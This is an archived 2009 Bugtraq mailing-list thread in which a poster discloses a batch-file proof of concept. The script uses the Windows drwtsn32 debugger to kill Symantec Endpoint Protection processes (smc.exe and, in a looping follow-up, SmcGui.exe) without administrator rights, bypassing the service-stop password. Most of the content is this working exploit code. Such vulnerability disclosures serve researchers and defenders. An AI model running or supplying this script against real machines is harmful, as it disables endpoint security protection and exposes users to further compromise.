lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 13 Feb 2009 20:06:24 +0530
From: "Sandeep Cheema" <51l3n7@...e.in>
To: <bugtraq@...urityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f

For the "users" its working for SmcGUI.exe

Please find the code as below.

:here
tasklist | find /i "SmcGui.exe" > c:\pid.txt
FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
drwtsn32 -p %pidopt%
goto :here

I have tried it and when let this file run for around 2 mins, The SmcGui.exe 
process loads up when you logoff and log back in (or restart)but the icon 
does not show up in the taskbar.

Thank you.

Regards, Sandeep

--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@...e.in>
Sent: Friday, February 13, 2009 7:03 PM
To: <bugtraq@...urityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f

> As an update its not happening for "Users" account, Though no access 
> denied.
>
> Anyone knows why?
>
> Thank you.
>
> Regards, Sandeep
>
> --------------------------------------------------
> From: "Sandeep Cheema" <51l3n7@...e.in>
> Sent: Friday, February 13, 2009 6:18 PM
> To: <bugtraq@...urityfocus.com>
> Subject: SEPKILL /im SMC.EXE /f
>
>> Hi,
>>
>> Probably this bug exists on majorly all the software's but security 
>> software's like antivirus and firewall have to bucket it which is not 
>> what its for SEP.
>> I have tested it on all versions of SEP from 11.0.776 to 11.0.4000(XP and 
>> 2k3)
>>
>>
>> You can kill smc.exe with the help of drwtsn32.exe in the following way.
>>
>> drwtsn32 -p %pid%
>> where pid is the process id for smc.exe
>>
>> POC:
>>
>> Save the following as a batch file and execute it
>>
>> tasklist | find /i "Smc.exe" > c:\pid.txt
>> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
>> drwtsn32 -p %pidopt%
>>
>>
>>
>> You don't need admin privilege for this exploit.
>>
>> This will even bypass the password if it has been set to stop the 
>> service.
>> If executed from the command line in the form drwtsn32 -p %pid% , the 
>> command will be executed and it takes some time for the process to be 
>> stopped.
>> If done from a batch file the command is completed only when the process 
>> is stopped.
>>
>> Regards, Sandeep
>> 51l3n7[at]live.in
>>
>>
>>

Powered by blists - more mailing lists